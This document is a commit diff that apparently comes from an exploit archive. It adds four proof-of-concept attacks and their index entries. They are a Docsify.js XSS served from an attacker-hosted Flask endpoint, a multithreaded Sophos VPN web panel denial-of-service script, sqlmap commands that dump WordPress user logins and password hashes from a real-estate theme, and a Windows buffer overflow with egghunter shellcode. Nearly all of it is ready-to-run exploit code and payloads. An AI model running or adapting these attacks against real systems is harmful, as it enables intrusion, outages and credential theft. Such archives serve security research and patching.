DB: 2020-07-23

4 changes to exploits/shellcodes NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter) Docsify.js 4.11.4 - Reflective Cross-Site Scripting WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection Sophos VPN Web Panel 2020 - Denial of Service (Poc)
2020-07-23 05:02:04 +00:00 · 2020-07-23 05:02:04 +00:00 · 67c1f99f41
commit 67c1f99f41
parent bd3d5964fc
5 changed files with 284 additions and 0 deletions
--- a/exploits/multiple/webapps/48681.txt
+++ b/exploits/multiple/webapps/48681.txt
@ -0,0 +1,66 @@
+# Exploit Title: Docsify.js 4.11.4 - Reflective Cross-Site Scripting
+# Date: 2020-06-22
+# Exploit Author: Amin Sharifi
+# Vendor Homepage: https://docsify.js.org
+# Software Link: https://github.com/docsifyjs/docsify
+# Version: 4.11.4
+# Tested on: Windows 10
+# CVE : CVE-2020-7680
+
+
+docsify.js uses fragment identifiers (parameters after # sign) to load
+resources from server-side .md files. it then renders the .md file inside
+the HTML page.
+
+For example : https://docsify.js.org/#/quickstart sends an ajax to
+https://docsify.js.org/quickstart.md and renders it inside the html page.
+
+due to lack of validation it is possible to provide external URLs after the
+/#/ and render arbitrary javascript/HTML inside the page which leads to
+DOM-based Cross Site Scripting (XSS).
+
+
+Steps to reproduce:
+
+step 1. setup a server (for example I use flask here, for the POC im
+hosting one on https://asharifi.pythonanywhere.com )
+
+step 2. the server should respond to request to /README.md with a crafted
+XSS payload. here is the payload "Html Injection and XSS PoC</p><img src=1
+onerror=alert(1)><img src=1 onerror=alert(document.cookie)><p>"
+also the CORS should be set so that other Origins would be able to send
+ajax requests to the server so Access-Control-Allow-Origin must be set to *
+(or to the specific domain that you wanna exploit) example code below:
+
+-------------------------------------------------
+from flask import Flask
+import flask
+
+app = Flask(__name__)
+
+
+@app.route('/README.md')
+def inject():
+    resp = flask.Response("Html Injection and XSS PoC</p><img src=1
+onerror=alert(1)><img src=1 onerror=alert(document.cookie)><p>")
+    resp.headers['Access-Control-Allow-Origin'] = '*'
+    return resp
+
+------------------------------------------------------
+step 3. craft the link for execution of the exploit
+for example for https://docsify.js.org website you can create the link as
+below
+
+https://docsify.js.org/#//asharifi.pythonanywhere.com/README
+(note that the mentioned domain is no longer vulnerable at the time writing
+this report)
+
+when a user visits this URL an ajax request will be sent to
+asharifi.pythonanywhere.com/README.md and the response of the request will
+be rendered inside the webpage which results in XSS payload being executed
+on the page.
+
+
+snyk advisory: https://snyk.io/vuln/SNYK-JS-DOCSIFY-567099
+Mitre CVE entry:
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7680
--- a/exploits/multiple/webapps/48683.py
+++ b/exploits/multiple/webapps/48683.py
@ -0,0 +1,99 @@
+# Exploit Title: Sophos VPN Web Panel 2020 - Denial of Service (Poc)
+# Date: 2020-06-17
+# Exploit Author: Berk KIRAS
+# Vendor Homepage: https://www.sophos.com/
+# Version:2020 Web Panel
+# Tested on: Apache
+# Berk KIRAS PwC - Cyber Security Specialist 
+# Sophos VPN Web Portal Denial of Service Vulnerability
+# System parse JSON data. If we want to send some JSON with invalid data format 
+#  for ex. valid -> {"test","test2"} , invalid -> {"test",PAYLOAD"test2"} 
+# The system can not parse this data fastly and service down
+# payload_option2 ="../../../../../../../../../FILE./FILE"
+
+#!/usr/bin/python3
+
+import requests
+import sys
+import random
+import threading
+
+def send_req():
+        cnt = random.randint(9,22)
+        payload= "../"*cnt+'{FILE}'
+        my_datas_params = {"username":"test",
+        payload+"password":"admin",
+        "cookie":"0",
+        "submit":"<div class=\"login_screen_login_button_left\"></div><div class=\"login_screen_login_button_middle\">Oturum Aç</div><div class=\"login_screen_login_button_right\"></div>",
+        "language":"turkish",
+        "browser_id":"kbgacsyo-q4j5o7lr70e"}
+    
+            # You should change some values into the headers
+        Host_addr = sys.argv[2]
+        Origin=sys.argv[1]+"://"+sys.argv[2]
+        Referrer=sys.argv[1]+"://"+sys.argv[2]
+        Cookie=sys.argv[4]
+        #Headers
+        my_datas_headers ={
+            "Host":str(Host_addr),
+            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0",
+            "Accept": "text/javascript, text/html, application/xml, text/xml, */*",
+            "Accept-Language": "tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3",
+            "Accept-Encoding": "gzip, deflate",
+            "X-Requested-With": "XMLHttpRequest",
+            "X-Prototype-Version": "1.6.1_rc3",
+            "Content-type": "application/json; charset=UTF-8",
+            "Origin":Origin,
+            "Connection": "close",
+            "Referer":Referrer,
+            "Cookie":Cookie,
+        }
+        my_datas_headers2 ={
+            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0",
+            "Accept": "text/javascript, text/html, application/xml, text/xml, */*",
+            "Accept-Language": "tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3",
+            "Accept-Encoding": "gzip, deflate",
+            "X-Requested-With": "XMLHttpRequest",
+            "X-Prototype-Version": "1.6.1_rc3",
+            "Content-type": "application/json; charset=UTF-8",
+            "Connection": "close",
+        }
+        #If you want to edit and add headers some headers added
+        s = requests.session()
+       #if you want simple-> headers={'User-Agent': 'Mozilla', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive'}
+        s.headers.update(my_datas_headers2)
+        print(s.headers.items)
+        r = s.post(sys.argv[1]+"://"+sys.argv[2]+sys.argv[3],data=my_datas_params)
+        
+        return s
+ 
+def main():
+    if(len(sys.argv) < 6): 
+        print("Usage:1) Implement your headers \n2)change payload if you want \n3) exploit.py <http/https> <domain> <page> <cookie-val> <Thread(1-10)> \nExample-> exploit.py http vpn.test.com /test/index.plx 2\nCoded by b3rkk1r4s | PwC Cyber")
+        sys.exit(0)
+    else:
+        try:
+                req_count=0  
+                while(True):
+                    if(int(sys.argv[5])==1):
+                        resp = send_req()
+                        req_count=req_count+1
+                        print("Sending Requests... Count: "+str(req_count))
+                    else:
+                        threads = int(sys.argv[5])
+                        jobs = []
+                        for i in range(0, threads):
+                            out_list = list()
+                            thread = threading.Thread(target=send_req)
+                            jobs.append(thread)
+                        for j in jobs:
+                            j.start()
+                        print("Jobs Started!")
+                        # Ensure all of the threads have finished
+                        for j in jobs:
+                            j.join()
+                        
+        except Exception:
+            print(Exception)
+
+main()
--- a/exploits/php/webapps/48682.txt
+++ b/exploits/php/webapps/48682.txt
@ -0,0 +1,53 @@
+# Exploit Title: WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection
+# Google Dork: inurl:/wp-content/themes/nexos/
+# Date: 2020-06-17
+# Exploit Author: Vlad Vector
+# Vendor: Sanljiljan [ https://themeforest.net/user/sanljiljan ]
+# Software Version: 1.7
+# Software Link: https://themeforest.net/item/nexos-real-estate-agency-directory/21126242
+# Tested on: Debian 10
+# CVE: CVE-2020-15363, CVE-2020-15364
+# CWE: CWE-79, CWE-89
+
+
+
+### [ Info: ]
+
+[i] The Nexos theme through 1.7 for WordPress allows side-map/?search_order= SQL Injection.
+
+
+
+### [ Vulnerabilities: ]
+
+[x] Unauthenticated Reflected XSS
+[x] SQL Injection
+
+
+
+### [ PoC Unauthenticated Reflected XSS: ]
+
+[!] TARGET/TARGET-DIR/top-map/?search_order=idlisting DESC&search_location="><img src=x onerror=alert(`VLΛDVΞCTOR`);window.location=`https://twitter.com/vlad_vector`%3E>
+
+[!] GET /TARGET-DIR/top-map/?search_order=idlisting%20DESC&search_location=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://twitter.com/vlad_vector`%3E%3E HTTP/1.1
+Host: listing-themes.com
+
+
+
+### [ PoC SQL Injection: ]
+
+[!] sqlmap --url="TARGET/TARGET-DIR/side-map/?search_order=idlisting%20DESC" -dbs --random-agent --threads 4
+
+[02:23:33] [INFO] the back-end DBMS is MySQL
+[02:23:33] [INFO] fetching database names
+[02:23:33] [INFO] fetching number of databases
+[02:23:33] [INFO] resumed: 2
+available databases [2]:
+[*] geniuscr_nexos
+[*] information_schema
+
+[!] sqlmap --url="TARGET/TARGET-DIR/side-map/?search_order=idlisting%20DESC" -D geniuscr_nexos -T wp_users -C user_login,user_pass,user_email --random-agent --threads 8
+
+Database: TARGET-DB
+Table: wp_users
+[9 entries]
+--------------+------------------------------------+-------------------------+
--- a/exploits/windows/local/48680.py
+++ b/exploits/windows/local/48680.py
@ -0,0 +1,62 @@
+# Exploit Title: NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter)
+# Date: 2019-06-28
+# Exploit Author: Saeed reza Zamanian
+# Vendor Homepage: https://sourceforge.net/projects/netpclinker/
+# Software Link: https://sourceforge.net/projects/netpclinker/files/
+# Version: 1.0.0.0
+# Tested on: Windows Vista SP1
+
+#!/usr/bin/python
+
+'''
+# Replicate Crash:
+  1) Install and Run the application
+  2) Go to second tab "Clients Control Panel"
+  3) Press Add button
+  4) Run the exploit , the exploit creates a text file named payload.txt
+  5) Copy payload.txt contents into the add client dialog , "DNS/IP" field
+  6) Press OK . Your shellcode will be executed by pressing OK button.
+
+'''
+
+#msfvenom -p windows/exec CMD=calc -f c -b "\x00\x0a\x0d\x33\x35\x36"
+#Bad Characters : \x0a\x0d\x33\x35\x36
+
+shellcode = (
+"\xdb\xc4\xd9\x74\x24\xf4\x5b\xbe\x9a\x32\x43\xd2\x31\xc9\xb1"
+"\x30\x83\xc3\x04\x31\x73\x14\x03\x73\x8e\xd0\xb6\x2e\x46\x96"
+"\x39\xcf\x96\xf7\xb0\x2a\xa7\x37\xa6\x3f\x97\x87\xac\x12\x1b"
+"\x63\xe0\x86\xa8\x01\x2d\xa8\x19\xaf\x0b\x87\x9a\x9c\x68\x86"
+"\x18\xdf\xbc\x68\x21\x10\xb1\x69\x66\x4d\x38\x3b\x3f\x19\xef"
+"\xac\x34\x57\x2c\x46\x06\x79\x34\xbb\xde\x78\x15\x6a\x55\x23"
+"\xb5\x8c\xba\x5f\xfc\x96\xdf\x5a\xb6\x2d\x2b\x10\x49\xe4\x62"
+"\xd9\xe6\xc9\x4b\x28\xf6\x0e\x6b\xd3\x8d\x66\x88\x6e\x96\xbc"
+"\xf3\xb4\x13\x27\x53\x3e\x83\x83\x62\x93\x52\x47\x68\x58\x10"
+"\x0f\x6c\x5f\xf5\x3b\x88\xd4\xf8\xeb\x19\xae\xde\x2f\x42\x74"
+"\x7e\x69\x2e\xdb\x7f\x69\x91\x84\x25\xe1\x3f\xd0\x57\xa8\x55"
+"\x27\xe5\xd6\x1b\x27\xf5\xd8\x0b\x40\xc4\x53\xc4\x17\xd9\xb1"
+"\xa1\xe8\x93\x98\x83\x60\x7a\x49\x96\xec\x7d\xa7\xd4\x08\xfe"
+"\x42\xa4\xee\x1e\x27\xa1\xab\x98\xdb\xdb\xa4\x4c\xdc\x48\xc4"
+"\x44\xbf\x0f\x56\x04\x40"
+)
+
+egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x65\x7a\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
+nSEH = '\xEB\xAA\x90\x90' #Jump Back
+
+# (Vista)
+# PPR(ecx)  : 0x00494b67 : startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [NPL.exe] 
+# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.0 (C:\Program Files\NetPCLinker\NPL.exe)
+
+SEH =  '\x67\x4b\x49'
+offset = "RezaReza"+shellcode +'\x41'*(1199-8-len(shellcode)-len(egghunter)-50)
+
+payload = offset+egghunter+"\x90"*50+nSEH+SEH
+
+try:
+    f=open("payload.txt","w")
+    print("[+] Creating %s bytes payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -11122,6 +11122,7 @@ id,file,description,date,author,type,platform,port
 48644,exploits/hardware/local/48644.c,"Sony Playstation 4 (PS4) < 7.02 / FreeBSD 9 / FreeBSD 12 - 'ip6_setpktopt' Kernel Local Privilege Escalation (PoC)",2020-03-21,TheFloW,local,hardware,
 48677,exploits/windows/local/48677.txt,"Sonar Qube 8.3.1 - 'SonarQube Service' Unquoted Service Path",2020-07-17,"Velayutham Selvaraj",local,windows,
 48678,exploits/windows/local/48678.py,"Simple Startup Manager 1.17 - 'File' Local Buffer Overflow (PoC)",2020-07-17,PovlTekstTV,local,windows,
+48680,exploits/windows/local/48680.py,"NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter)",2020-07-22,"Saeed reza Zamanian",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -42926,3 +42927,6 @@ id,file,description,date,author,type,platform,port
 48674,exploits/php/webapps/48674.txt,"Infor Storefront B2B 1.0 - 'usr_name' SQL Injection",2020-07-15,ratboy,webapps,php,
 48676,exploits/lua/webapps/48676.txt,"Wing FTP Server 6.3.8 - Remote Code Execution (Authenticated)",2020-07-16,V1n1v131r4,webapps,lua,
 48679,exploits/php/webapps/48679.txt,"CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)",2020-07-17,Noth,webapps,php,
+48681,exploits/multiple/webapps/48681.txt,"Docsify.js 4.11.4 - Reflective Cross-Site Scripting",2020-07-22,"Amin Sharifi",webapps,multiple,
+48682,exploits/php/webapps/48682.txt,"WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection",2020-07-22,"Vlad Vector",webapps,php,
+48683,exploits/multiple/webapps/48683.py,"Sophos VPN Web Panel 2020 - Denial of Service (Poc)",2020-07-22,"Berk KIRAS",webapps,multiple,